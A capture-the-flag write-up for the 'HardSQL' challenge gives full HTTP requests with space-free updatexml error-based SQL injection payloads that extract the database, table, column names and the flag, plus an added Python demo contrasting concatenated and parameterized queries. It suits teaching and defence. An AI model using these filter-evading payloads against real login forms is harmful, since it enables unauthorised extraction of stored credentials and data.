[Geek Challenge 2019] HardSQL

Published: 2023-11-03 01:56:33 Author: imtaieee

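Open the challenge page.
Fuzzing shows that many keywords are filtered, including common ones such as the space character, union, and the keyword and.
Error-based injection is used here to extract the flag.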

GET /check.php?username=1&password=1'or(updatexml(1,concat(0x7e,database()),1))%3b%23 HTTP/1.1
Host: cb6a5fc0-3cbe-4dde-92c4-3dbdc9d2f0e4.node4.buuoj.cn:81
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://cb6a5fc0-3cbe-4dde-92c4-3dbdc9d2f0e4.node4.buuoj.cn:81/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


GET /check.php?username=1&password=1'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database()))),1))%3b%23 HTTP/1.1
Host: cb6a5fc0-3cbe-4dde-92c4-3dbdc9d2f0e4.node4.buuoj.cn:81
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://cb6a5fc0-3cbe-4dde-92c4-3dbdc9d2f0e4.node4.buuoj.cn:81/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


GET /check.php?username=1&password=1'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1'))),1))%3b%23 HTTP/1.1
Host: cb6a5fc0-3cbe-4dde-92c4-3dbdc9d2f0e4.node4.buuoj.cn:81
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://cb6a5fc0-3cbe-4dde-92c4-3dbdc9d2f0e4.node4.buuoj.cn:81/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


GET /check.php?username=1&password=1'or(updatexml(1,concat(0x7e,(select(left(password,30))from(H4rDsq1)where(username)like('flag'))),1))%3b%23 HTTP/1.1
Host: cb6a5fc0-3cbe-4dde-92c4-3dbdc9d2f0e4.node4.buuoj.cn:81
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://cb6a5fc0-3cbe-4dde-92c4-3dbdc9d2f0e4.node4.buuoj.cn:81/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


GET /check.php?username=1&password=1'or(updatexml(1,concat(0x7e,(select(right(password,30))from(H4rDsq1)where(username)like('flag'))),1))%3b%23 HTTP/1.1
Host: cb6a5fc0-3cbe-4dde-92c4-3dbdc9d2f0e4.node4.buuoj.cn:81
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://cb6a5fc0-3cbe-4dde-92c4-3dbdc9d2f0e4.node4.buuoj.cn:81/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


Because the error message carries at most 32 characters, the data has to be leaked in two passes.
Reference: https://blog.csdn.net/pakho_C/article/details/122825747
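
The keyword filter found by fuzzing does not stop the requests above, because none of them needs a space, union or and. The following is an added example, not code from the challenge or from the original post: it models that filter and puts a string-concatenated login query beside a parameterized one. Assumptions: the filter is a plain substring blacklist, the users table is constructed, and SQLite stands in for the challenge's MySQL.

```python
import sqlite3

# Assumption: a case-insensitive substring blacklist of the tokens the
# write-up names (space, union, and). The real check.php is not shown.
BLACKLIST = (" ", "union", "and")

# Password value from the first request on the page, URL-decoded.
PAGE_PAYLOAD = "1'or(updatexml(1,concat(0x7e,database()),1));#"


def blacklist_blocks(value: str) -> bool:
    lowered = value.lower()
    return any(token in lowered for token in BLACKLIST)


def make_db() -> sqlite3.Connection:
    # Constructed stand-in table; SQLite replaces the challenge's MySQL.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'constructed-secret')")
    return db


def login_concat(db: sqlite3.Connection, username: str, password: str) -> str:
    # Vulnerable pattern: input is spliced into the SQL text.
    sql = ("SELECT 1 FROM users WHERE username='" + username +
           "' AND password='" + password + "'")
    try:
        return "ok" if db.execute(sql).fetchone() else "denied"
    except sqlite3.Error as exc:
        # The engine tried to compile the input as SQL. On MySQL, an error
        # text like this is the channel that returns data to the client.
        return "sql-error: " + str(exc)


def login_param(db: sqlite3.Connection, username: str, password: str) -> str:
    # Hardened pattern: placeholders keep input as data, never as SQL.
    sql = "SELECT 1 FROM users WHERE username=? AND password=?"
    return "ok" if db.execute(sql, (username, password)).fetchone() else "denied"


if __name__ == "__main__":
    db = make_db()
    print("blacklist blocks payload:", blacklist_blocks(PAGE_PAYLOAD))
    print("concatenated query:", login_concat(db, "1", PAGE_PAYLOAD))
    print("parameterized query:", login_param(db, "1", PAGE_PAYLOAD))
```

The SQL error on the concatenated path shows that the input reached the SQL parser as code. Suppressing detailed database errors in responses closes the error channel, but only the parameterized query removes the injection itself.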